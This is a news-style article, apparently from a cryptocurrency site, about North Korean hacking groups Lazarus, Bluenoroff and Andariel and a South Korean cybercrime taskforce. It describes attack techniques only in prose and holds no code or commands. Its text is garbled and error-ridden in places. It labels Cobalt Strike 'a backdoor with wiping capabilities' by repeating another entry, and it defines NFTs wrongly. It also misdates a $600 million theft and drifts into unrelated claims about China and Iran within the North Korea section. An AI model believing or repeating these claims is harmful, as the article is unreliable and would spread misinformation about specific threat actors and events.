New South Korean Cybercrime Taskforce Targets Crypto Scams Involving Malware From North Korea

Cryptocurrency is a digital form of currency created and stored using an individual identification number and encryption algorithm. It offers people the freedom to transact with others without needing the assistance of an intermediary such as banks.

Cybercriminals are increasingly taking advantage of cryptocurrency to commit criminal acts and cause harm. Illicit uses of cryptocurrency pose a grave danger to public safety and national security.

Lazarus Group

The Lazarus Group, also known as Hidden Cobra, has been active since 2009 and believed to be affiliated with the North Korean government. It has been responsible for numerous high-profile attacks such as Ronin's $600 million cryptocurrency heist and Harmony's Horizon Bridge hack.

Cisco Talos reports that the group has employed various techniques to compromise targets, such as credential harvesting tools and proxy services. It also uses reverse tunneling and auto-run services to maintain persistence on compromised servers.

In addition to energy providers, the group has also been observed conducting espionage against defense and governmental organizations as well as companies in the chemical sector. These activities appear to be aligned with North Korean government goals and objectives, according to a cybersecurity company.

Researchers recently identified a new campaign being run by this group that is similar to earlier efforts, yet with several notable differences. These include using IP addresses without domain names, an exploit for Log4Shell vulnerabilities that create reverse shells on compromised endpoints, and the presence of a C2 server hosting the payload itself.

Though the payload in this new campaign is not groundbreaking, Asec noted that it still proves effective and shows the Lazarus Group has progressed from previous strategies.

The Lazarus Group has a history of siphoning off large amounts of cryptocurrency, and was recently observed infecting cryptocurrency exchanges with malicious Windows and macOS applications that steal private keys and exploit security flaws in fraudulent transactions. Furthermore, these hackers have attempted to hack blockchain and cryptocurrency exchanges in an effort to circumvent sanctions, according to the research team.

Lazarus Group recently conducted a campaign that exposed several malware types, such as NukeSped (a remote access trojan (RAT), Cobalt Strike (a backdoor with wiping capabilities) and DESTOVER (a backdoor with wiping capabilities). Furthermore, Asec reported that this group has been working alongside Kimsuky (another hacking group associated with North Korean government) for some time.

Due to these efforts, the South Korean government recently created a cybercrime taskforce with the purpose of safeguarding businesses against malicious actors such as Lazarus Group. Furthermore, MITRE ATT&CK created a threat matrix to categorize all types of hacking techniques and procedures employed by hackers when targeting their targets.

Bluenoroff

Kaspersky Labs released a report this week that identified Bluenoroff, an advanced persistent threat (APT) group associated with North Korea, as being behind sophisticated phishing and social engineering attacks against cryptocurrency startups worldwide. According to the report, Bluenoroff targets companies worldwide involved with smart contracts, DeFi, and Blockchains.

Kaspersky reports that the hacking group has been targeting financial institutions and cryptocurrency exchanges, as well as small to medium-sized crypto businesses. To carry out these attacks, they use malicious documents and fake MetaMask browser extensions, according to Kaspersky's findings.

The APT group uses multiple infection chains and builds them according to the situation. It utilizes weaponized Word documents, Windows shortcut files, and zipped malware in order to spread malicious code. Furthermore, they possess a Powershell agent and keylogger which monitor victim activity.

Additionally, it has been observed circumventing Microsoft Windows' Mark of the Web (MOTW) technology to deliver its malicious software more effectively. The group has been using obfuscated optical disk image (.iso extension) and virtual hard disk (.vhd extension) file formats, allowing them to bypass MOTW warnings that typically appear when users open a file from the internet.

It has also been seen attempting to steal nonfungible tokens, or assets that cannot be converted into cash through traditional means. It has previously stolen hundreds of millions in cryptocurrency, including $600-million in March 2018.

Throughout its operation, the APT group used malicious e-mails and fake websites to target a range of organizations around the world. Furthermore, it employed an innovative heist technique that allowed it to inject funds into a company's account without leaving behind any trace behind.

This method involves altering an inbound transaction and inserting a new recipient address for it. Additionally, they have been seen targeting Society for Worldwide Interbank Financial Telecommunication (SWIFT) software to achieve this effect.

Through these actions, it was able to siphon off funds from companies around the world and use them for its operations. The group has been responsible for numerous attacks over recent years, such as hacking into Sony's system in 2014 and Bangladeshi central bank data in 2016.

Andariel

The South Korean Cybercrime Taskforce, led by the National Police Agency, is actively combatting crypto scams involving malware from North Korea. The team will draw on a variety of sources to detect threats and provide intelligence about cybercriminals.

Recently, Andariel has been identified as a group engaged in targeted cyberespionage and monetization. Their activities date back to at least 2015 and their targets include state, government and army organizations as well as financial service providers.

Andariel has been identified engaging in various cyberespionage attacks, such as watering hole attacks against South Korean websites and Active X zero-day exploits for intelligence gathering. Furthermore, Andariel appears to have employed customized ransomware in recent campaigns for financial gain, according to CISA and US-CERT.

Recently, Andariel has deployed DTrack and Maui ransomware against target networks in Japan, Russia, India, and Vietnam. Kaspersky researchers have linked these attacks to Andariel and were able to pinpoint their origins to April 2021.

At the start of the attack, Andariel uses a malicious access file that downloads and executes a remote payload using Mshta. After it completes execution, it encrypts all files on the infected device, demanding payment in Bitcoin in exchange for restoring access to their encrypted data.

Another distinguishing characteristic of this malware is its use of MagicRAT, a remote access trojan (RAT) created by North Korean nation-state actors that has been observed in several recent incidents. While RATs can monitor networks and deliver malicious content to victims, Cisco Talos describes MagicRAT's capabilities as more advanced than those of other RATs.

Besides this, Andariel's infection process involves several additional steps. These include downloading and saving various stages of the malware, executing code, and exfiltrating a payload. Furthermore, Andariel utilizes 3Proxy, an open proxy server utility which can be used to access internal resources within a victim network. This tool has been observed in previous campaigns by Andariel and is believed to be part of their malware infection strategy.

North Korea

North Korea boasts a nuclear arsenal that could easily target the United States and its allies. Pyongyang has tested nuclear weapons six times, as well as developing ballistic missiles capable of reaching Japan or South Korea.

As the United States and its allies continue to impose sanctions on Pyongyang, its cyber activities have become an increasingly significant source of income for its weapons programme. A 2020 US military report estimates that Pyongyang's cyber unit now numbers over 6,000 personnel.

North Korea is developing a range of offensive capabilities in addition to its nuclear arsenal, such as ballistic missiles and long-range land attack cruise missiles. According to a 2023 US military report, these weapons can reach targets across the Pacific Ocean and East China Sea.

These weapons could be used to wreak destruction on South Korea and its infrastructure, as well as pose a potential security risk for the United States. Despite economic and diplomatic sanctions placed upon Pyongyang by the United States and its allies, Pyongyang continues to develop offensive capabilities in an effort to maintain control of the Korean peninsula.

North Korea has also been developing a large stockpile of fissile material, which it could potentially use to construct nuclear bombs. According to the Bulletin of the Atomic Scientists, they estimate they possess enough material for forty to fifty nuclear bombs.

Rumours persist that China's regime is working on a miniaturised nuclear bomb, which could be attached to a small missile. If successful, this would enable them to mass produce tactical nuclear weapons with which they could attack South Korea with ease.

The United States and its allies have imposed sanctions on Iran for its nuclear weapons program, yet it has continued to develop cyber capabilities, such as cybertheft of money from financial organizations and cryptocurrency exchanges.

Although the exact amount of money North Korea has stolen through cybertheft remains uncertain, a UN report estimates that they have amassed over $2 billion through this illicit activity as of 2019.

Cryptocurrency heists have proven to be one of the most lucrative forms of cybercrime for North Korea. A UN report estimates that their regime has stolen an impressive $250 million worth in virtual currencies through heists so far this year alone.

The above references an opinion and is for information purposes only. It is not intended to be investment advice. Seek a duly licensed professional for investment advice.